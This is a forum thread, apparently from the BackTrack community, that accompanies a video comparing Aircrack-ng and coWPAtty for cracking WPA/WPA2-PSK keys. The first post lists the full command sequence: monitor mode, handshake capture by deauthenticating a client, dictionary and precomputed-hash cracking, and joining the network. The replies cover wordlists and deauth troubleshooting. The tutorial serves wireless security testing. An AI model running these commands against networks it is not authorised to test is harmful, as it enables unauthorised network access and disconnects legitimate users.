Results 1 to 10 of 38

Thread: [Video] Cracking WiFi - WPA/WPA2 (Aircrack-ng vs coWPAtty)

Hybrid View

  1. #1
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Lightbulb [Video] Cracking WiFi - WPA/WPA2 (Aircrack-ng vs coWPAtty)

    Links
    Watch videoon-line: http://g0tmi1k.blip.tv/file/3356785
    Download video: http://www.mediafire.com/?9dkjbygu238p2uj


    What is this?

    Comparing Aircrack-ng versus coWPAtty, in the time it takes to crack a WPA2 PSK key.
    It shows 4 different cracks, the time taken and speed of the crack (see results).
    > Aircrack-ng (Dictionary)
    > Aircrack-ng & airolib-ng (Pre-computed hashes)
    > coWPAtty (Dictionary)
    > coWPAtty & Genpmk (Pre-computed hashes)


    How does this work?
    To crack WPA/WPA2 PSK you need to capture a ‘Handshake’ . The best way to this packet the attacker needs to disconnect a connected client currently on the network (if the attacker keeps on repeating this part, it will be a DoS to the user).

    Once the key packet has been captured, it is time to start an offline dictionary attack. If the network key is in the dictionary, its just a question of waiting to process the dictionary file.

    From here, the attacker can use that key to decrypt the captured data from before, and now is able to ‘read’ it as well as join the network.

    If there isn't a connected client - you cant do this. If the network key isnt in the dictionary file - you cant do this.

    You can speed the the cracking process by creating pre-calculated hash files (see results - for how much faster!)

    Results
    *For the table see blog*









    What do I need?
    > Aircrack-ng suite
    > WiFi card that supports monitor mode
    > Big dictionary
    > Processing power


    Software
    Name: Aircrack-ng
    Version: 1.0-rc3
    Home Page: http://www.aircrack-ng.org/doku.php
    Download Link: http://download.aircrack-ng.org/airc...1.0-rc3.tar.gz

    Name: coWPAtty
    Version: 4.3
    Home Page: http://www.willhackforsushi.com/Cowpatty.html
    Download Link: http://www.willhackforsushi.com/code/cowpatty/4.3/cowpatty-4.3.tgz

    Commands:
    Code:
    airmon-ng start wlan0
    airodump-ng mon0
    
    airodump-ng --channel 5 --write output --bssid 00:24:B2:A0:51:14 mon0
    
    aireplay-ng --deauth 1 -a 00:24:B2:A0:51:14 -c 00:14:17:94:90:0D mon0
    aircrack-ng output-01.cap -w /root/tools/dictionaries/webster-dictionary.txt
    
    
    
    airolib-ng crackwpa --import passwd /root/dictionaries/webster-dictionary.txt
    airolib-ng crackwpa --import essid essid
    airolib-ng crackwpa --stats
    airolib-ng crackwpa --clean all
    airolib-ng crackwpa --batch
    airolib-ng crackwpa --verify all
    aircrack -r crackwpa output-01.cap
    
    
    
    cowpatty -s g0tmi1k -r /root/output-01.cap -f /root/dictionaries/webster-dictionary.txt
    
    
    
    genpmk -s g0tmi1k -d /root/output-hash -f /root/dictionaries/webster-dictionary.txt
    cowpatty -s g0tmi1k -r /root/output-01.cap -d /root/output-hash
    
    
    
    wpa_passphrase g0tmi1k precivilization > wpa.conf
    wpa_supplicant -Dwext -iwlan0 -c /root/wpa.conf
    dhclient -r
    dhclient wlan0
    ping 192.168.1.1



    Notes:

    Song: First Sate - Off the Radar (First State's 808 Clash Mix)
    Video length: 08:38
    Capture length: 01:14:29


    Blog Post: http://g0tmi1k.blogspot.com/2010/02/...rcrack-ng.html
    Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/2394-%5Bvideo%5D-cracking-wifi-wpa-wpa2-aircrack-ng-vs-cowpatty.html
    Last edited by g0tmi1k; 03-05-2011 at 03:15 PM.
    Have you...g0tmi1k?

  2. #2
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    1

    Default Re: [Video] Cracking WiFi - WPA/WPA2 (Aircrack-ng vs coWPAtty)

    Thank you my dear, but how can I get a dictionary

  3. #3
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    4

    Default Re: [Video] Cracking WiFi - WPA/WPA2 (Aircrack-ng vs coWPAtty)

    You can find tons of different dictionaries all over the net just do some searching
    Remember google is your friend!

  4. #4
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] Cracking WiFi - WPA/WPA2 (Aircrack-ng vs coWPAtty)

    Quote Originally Posted by SAIEF007S View Post
    Thank you my dear, but how can I get a dictionary
    Ive posted a few on my blog. Link was in the top post, but incase you didnt see it:
    g0tmi1k: [Site News] February Update - ISOs and Dictionaries
    Have you...g0tmi1k?

  5. #5
    Just burned his ISO
    Join Date
    Jun 2010
    Posts
    1

    Default Re: [Video] Cracking WiFi - WPA/WPA2 (Aircrack-ng vs coWPAtty)

    so how would i use a dictionary i download if i use backtrack on a live boot cd

  6. #6
    Just burned his ISO
    Join Date
    Apr 2010
    Posts
    5

    Default Re: [Video] Cracking WiFi - WPA/WPA2 (Aircrack-ng vs coWPAtty)

    Quote Originally Posted by canihitdat View Post
    so how would i use a dictionary i download if i use backtrack on a live boot cd
    that's what i also would like to know if anyone could post a response with a link to a tutorial that would be great

  7. #7
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] Cracking WiFi - WPA/WPA2 (Aircrack-ng vs coWPAtty)

    Quote Originally Posted by codehpro View Post
    that's what i also would like to know if anyone could post a response with a link to a tutorial that would be great
    After downloading a dictionary...
    replace: /root/dictionaries/webster-dictionary.txt
    with: [Whereever you downloaded the file to!] EXAMPLE /root/dictionarythatijustdownloaded.dic
    Have you...g0tmi1k?

  8. #8
    Just burned his ISO CrazyBranch's Avatar
    Join Date
    Aug 2010
    Location
    Croatia
    Posts
    15

    Default Re: [Video] Cracking WiFi - WPA/WPA2 (Aircrack-ng vs coWPAtty)

    Quote Originally Posted by codehpro View Post
    that's what i also would like to know if anyone could post a response with a link to a tutorial that would be great
    There is a default BT4 dictionary located in /pentest/passwords/wordlists that contains about 1.7M words...if you want more extensive ones google them..i did just recently and found nice supply of them.
    As for usage you should study man pages of aircrack-ng or their tutorials at official pages.

  9. #9
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] Cracking WiFi - WPA/WPA2 (Aircrack-ng vs coWPAtty)

    Quote Originally Posted by mobster View Post
    I have been testing on my AP with WPA/WPA2-PSK CCMP
    everything was going ok until I realized that I can't get the "handshake" after using
    Code:
    aireplay-ng --deauth
    My Q is: do I have to use DoS attack to the connected PC so that I get the handshake or I only need to enter the deauth command once and I will get the handshake?
    What OS is your target running? I found that I can't deauth one of my Windows 7 systems
    If you DoS, you might stop the target from talking to the Access Point which will have the handshake which your after!
    You're going to have to wait for someone else to rejoin OR the current target to disconnect/reboot/poweroff...


    Quote Originally Posted by Jimmy87 View Post
    @Mobster,

    I believe that handshake occurs when the connected client, reconnects to the AP (after the deauth) meaning airodump can capture the handshake between the AP and the Client. If you do a DoS on the client it won't be able to connect back meaning you won't capture the handshake.

    If it's your own AP you're testing then deauth your client, reconnect with that client and you should see that airodump captures the handshake. I'm no expert but I think that's the basics.

    What response do you get when you send the deauth?
    Thanks for the reply.
    Yeah, that sound about right to me as well (but I'm not an expert too!)
    Could you,mobster, manually disconnect/connect - see if you can get the handshake that way - or if something else is going wrong...
    *If you can't TRY and manually join - then I don't think this is place for you...Rules*



    Quote Originally Posted by mobster View Post
    Thanks for the replay

    The response is the same in the video but it does not capture the handshake.

    I was reading other threads by g0tmi1k, and that if the client PC is windows 7 then there may be some problems. If this is the issue then what is the reason for it, is it windows 7 security related or another issue?
    It might just be my hardware/setup on my Windows 7 system, but I do know they have improved alot of the wireless networking since XP...
    Have you...g0tmi1k?

  10. #10
    Moderator g0tmi1k's Avatar
    Join Date
    Feb 2010
    Posts
    1,771

    Default Re: [Video] Cracking WiFi - WPA/WPA2 (Aircrack-ng vs coWPAtty)

    Quote Originally Posted by mobster View Post
    What I`m trying to say is that I have three machines one with BT, second with vista and the third with windows 7.

    I got the key when I was sniffing the vista machine but with the windows 7 I couldn't.
    Yeah, I've found this too. I haven't found why yet - because too many variables keep changing to pin point why its happening.
    I could do it to my desktop, but after moving house (with a new router) it wouldn't work on my laptop. Both have Windows 7.
    Ill mess about with some USB WiFi cards between the two and different OS - Just need the time!

    Quote Originally Posted by SEALDRA View Post
    THank you...I've been searching this video...but I wonder If someone with pure heart can give me a big dicitionary haha lol
    You can use the ones which comes with backtrack: /pentest/passwords/wordlists/
    and I've started to upload some: g0tmi1k: [Site News] February Update - ISOs and Dictionaries
    Last edited by g0tmi1k; 09-25-2010 at 01:36 PM.
    Have you...g0tmi1k?

Similar Threads

  1. [Video] Cracking WiFi - WEP with a client (aircrack-ng)
    By g0tmi1k in forum BackTrack Videos
    Replies: 7
    Last Post: 04-18-2011, 04:09 AM
  2. [Video] How to: Crack WPA/WPA2 (aircrack-ng + airolib-ng)
    By g0tmi1k in forum BackTrack Videos
    Replies: 50
    Last Post: 04-08-2011, 07:35 AM
  3. Replies: 20
    Last Post: 07-22-2010, 10:38 AM
  4. Understanding WPA2 cracking
    By Emiree in forum Beginners Forum
    Replies: 2
    Last Post: 03-05-2010, 10:51 AM
  5. Replies: 1
    Last Post: 01-14-2010, 05:58 AM

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •